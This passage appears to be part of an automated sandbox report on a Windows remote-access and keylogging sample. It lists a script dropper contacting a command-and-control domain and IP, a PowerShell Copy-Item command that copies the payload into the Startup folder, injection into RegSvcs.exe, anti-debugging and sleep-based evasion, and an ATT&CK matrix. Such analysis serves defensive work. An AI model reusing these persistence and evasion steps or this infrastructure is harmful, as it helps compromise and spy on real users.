            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5224, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3712, type: MEMORYSTR
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe TID: 1632Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe TID: 5152Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5392Thread sleep count: 8782 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5168Thread sleep count: 42 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4636Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe TID: 1220Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe TID: 4888Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1004Thread sleep count: 646 > 30Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8782Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 646Jump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exeThread delayed: delay time: 30000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeThread delayed: delay time: 30000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: powershell.exe, 0000000B.00000003.602907132.00000000050C5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V
            Source: powershell.exe, 0000000B.00000003.602907132.00000000050C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.634730844.0000000004ABB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.791732369.0000000004BF6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: /l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
            Source: RegSvcs.exe, 0000000D.00000002.776742894.0000000001182000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

            Anti Debugging

            barindex
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeCode function: 17_2_00EE29F8 CheckRemoteDebuggerPresent,17_2_00EE29F8
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\System32\wscript.exeFile created: VNZVNCXKKJSF[1].exe.0.drJump to dropped file
            Source: C:\Windows\System32\wscript.exeNetwork Connect: 50.115.174.192 443Jump to behavior
            Source: C:\Windows\System32\wscript.exeDomain query: tgc8x.tk
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 456000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 46E000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 474000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 475000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 476000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 47B000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: FBC008Jump to behavior
            Source: VNZVNCXKKJSF[1].exe.0.dr, A/cf8eb4e449d152e1244a7cf6f3ecbf85f.csReference to suspicious API methods: ('c8f92d37f364a4b3f4c9b618271871080', 'OpenProcess@kernel32.dll'), ('ccaecc5f3aab7d34885801a7248d378a6', 'GetProcAddress@kernel32.dll'), ('c33d649923dd65766b0659ff6d06d3e2f', 'GetProcAddress@kernel32.dll'), ('cb3e0424c0f0b37fb10b8f77664b6a089', 'LoadLibrary@kernel32.dll'), ('c6d7ecd4297f948f6002efd9b02178408', 'GetProcAddress@kernel32.dll'), ('c6445e228c9a2151fd4f4723042b67082', 'GetProcAddress@kernel32.dll'), ('c1f649e2cef6b40b1d2fba8e895975ff7', 'GetProcAddress@kernel32.dll'), ('c64da5c618679bd4e6703fb08a405ef26', 'GetProcAddress@kernel32.dll')
            Source: VNZVNCXKKJSF.exe.0.dr, A/cf8eb4e449d152e1244a7cf6f3ecbf85f.csReference to suspicious API methods: ('c8f92d37f364a4b3f4c9b618271871080', 'OpenProcess@kernel32.dll'), ('ccaecc5f3aab7d34885801a7248d378a6', 'GetProcAddress@kernel32.dll'), ('c33d649923dd65766b0659ff6d06d3e2f', 'GetProcAddress@kernel32.dll'), ('cb3e0424c0f0b37fb10b8f77664b6a089', 'LoadLibrary@kernel32.dll'), ('c6d7ecd4297f948f6002efd9b02178408', 'GetProcAddress@kernel32.dll'), ('c6445e228c9a2151fd4f4723042b67082', 'GetProcAddress@kernel32.dll'), ('c1f649e2cef6b40b1d2fba8e895975ff7', 'GetProcAddress@kernel32.dll'), ('c64da5c618679bd4e6703fb08a405ef26', 'GetProcAddress@kernel32.dll')
            Source: Systedbddfm.exe.11.dr, A/cf8eb4e449d152e1244a7cf6f3ecbf85f.csReference to suspicious API methods: ('c8f92d37f364a4b3f4c9b618271871080', 'OpenProcess@kernel32.dll'), ('ccaecc5f3aab7d34885801a7248d378a6', 'GetProcAddress@kernel32.dll'), ('c33d649923dd65766b0659ff6d06d3e2f', 'GetProcAddress@kernel32.dll'), ('cb3e0424c0f0b37fb10b8f77664b6a089', 'LoadLibrary@kernel32.dll'), ('c6d7ecd4297f948f6002efd9b02178408', 'GetProcAddress@kernel32.dll'), ('c6445e228c9a2151fd4f4723042b67082', 'GetProcAddress@kernel32.dll'), ('c1f649e2cef6b40b1d2fba8e895975ff7', 'GetProcAddress@kernel32.dll'), ('c64da5c618679bd4e6703fb08a405ef26', 'GetProcAddress@kernel32.dll')
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe "C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell" Copy-Item 'C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe'Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell" Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe'Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
            Source: VNZVNCXKKJSF.exe, 0000000A.00000002.414888406.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, Systedbddfm.exe, 00000011.00000002.707496328.0000000002C50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: VNZVNCXKKJSF.exe, 0000000A.00000002.414888406.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, Systedbddfm.exe, 00000011.00000002.707496328.0000000002C50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Progman
            Source: RegSvcs.exe, 0000000D.00000002.775300132.0000000001167000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerLR\
            Source: RegSvcs.exe, 0000000D.00000002.775300132.0000000001167000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerV,op"
            Source: RegSvcs.exe, 0000000D.00000002.775300132.0000000001167000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerQ,pp!
            Source: RegSvcs.exe, 0000000D.00000002.775300132.0000000001167000.00000004.00000020.00020000.00000000.sdmp, logs.dat.13.drBinary or memory string: [Program Manager]
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 13.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.VNZVNCXKKJSF.exe.3a0eb38.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.VNZVNCXKKJSF.exe.3a0eb38.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000A.00000003.388452418.0000000005071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.775300132.0000000001167000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.419463261.0000000003999000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.700880985.0000000001457000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000000.409632130.0000000000456000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: VNZVNCXKKJSF.exe PID: 5516, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 480, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 13.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.VNZVNCXKKJSF.exe.3a0eb38.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.VNZVNCXKKJSF.exe.3a0eb38.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000A.00000003.388452418.0000000005071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.775300132.0000000001167000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.419463261.0000000003999000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.700880985.0000000001457000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000000.409632130.0000000000456000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: VNZVNCXKKJSF.exe PID: 5516, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 480, type: MEMORYSTR
            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts42
            Scripting
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Disable or Modify Tools
            111
            Input Capture
            1
            File and Directory Discovery
            Remote Services11
            Archive Collected Data
            Exfiltration Over Other Network Medium1
            Ingress Tool Transfer
            Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default Accounts1
            Native API
            12
            Registry Run Keys / Startup Folder
            412
            Process Injection
            42
            Scripting
            LSASS Memory12
            System Information Discovery
            Remote Desktop Protocol111
            Input Capture
            Exfiltration Over Bluetooth11
            Encrypted Channel
            Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain Accounts1
            Exploitation for Client Execution
            Logon Script (Windows)12
            Registry Run Keys / Startup Folder
            4
            Obfuscated Files or Information
            Security Account Manager211
